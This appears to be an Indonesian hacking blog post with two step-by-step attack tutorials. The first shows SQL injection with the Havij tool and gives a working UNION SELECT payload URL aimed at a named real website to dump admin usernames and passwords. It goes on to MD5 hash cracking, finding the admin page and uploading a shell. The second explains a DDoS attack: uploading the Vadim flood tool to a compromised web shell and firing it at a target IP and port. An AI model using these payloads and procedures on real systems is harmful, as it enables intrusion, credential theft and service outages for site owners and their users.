Download Tools
------------------------------STEP 1 Inject Url Target
------------------------------
Masukan Url target di coloums paling atas lalu klik Analize
Lihat coloums pling bawah untuk mengetahui Vuln target & jumlah coloumn
pastekan url di browser dengan jumlah coloumn yang ada di Havij
teknik yang di gunakan disini (SQL injection ) untuk mencari username & password
contoh :
http://www.arenabola.com/?page=artikel&id=9+AND+1=2+union+select+1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12+from+admin--
----------------------------------------------------------------------
STEP 2 Menghash Password apabila masih berbentuk MD5
------------------------------------------------------------------------
Pilih MD5 & masukan password yang akan d hash...lalu klik Start
Password akan di hash secara online oleh havij di 15 Situs Hash password
Hasil
----------------------------------------
STEP 3 Mencari Halaman admin
----------------------------------------
Msukan url target lalu pilih Find Admin
Alhamdulillah user/password dan halaman admin sudah ketemu....tinggal di upload shell'y .....
Ry klo ada yang salah - masih newbie
Semoga bermanfaat
Tutorial - DDOS Menggunakan Vadim
Silahkan dibaca dulu pengertian'y --> http://id.wikipedia.org/wiki/Serangan_DoS
Step yang dilakukan dalam melakukan serangan Ddos:
1. Connect ke korban (host, port).
2. Kirimkan paket data dalam jumlah besar.
3. koneksi terputus > selesai.
Sebenar'y masih banyak tekhnik DDOS ATTACK.
tapi Yang akan ane bahas disini adalah Ddos dengan menggunakan shell dengan VADIM Sebagai senjata untuk menyerang.
Langkah Pertama :
Download file Vadim : http://upload.ugm.ac.id/259vadim.tar.gz
Langkah Kedua :
Upload Vadim yg dagh di donlot tadi ke Shell kalian. Kalo belum punya shell. silahkan minta ke temen.
Shell hrs dlm keadaan safemode Off, chmod'y permissionnya disetting 777 artinya kita mampu melakukan aksi baca, tulis dan eksekusi terhadap file tersebut.
Langkah Ketiga :
Ekstrak file Vadim menggunakan perintah --> tar -zxvf vadim.tar.gz Klik go
Setelah di ekstrak, nanti akan tercipta sebuah folder nama folder'y --> [Dos]. Setelah itu Klik folder tersebut. Kita masuk ke directory'y.
Langkah Keempat :
Setelah semua'y siap, ketik ini -->./vadimI [iptarget] [port] [jumlah paket]
Contoh : 111.111.111.111 80 9999999999999999999999 Klik go
Selanjut'y Klik go, and Kita tunggu hasil'y.
Thank
By-rixzoe Hackerzz
SOURCE
0 komentar:
Posting Komentar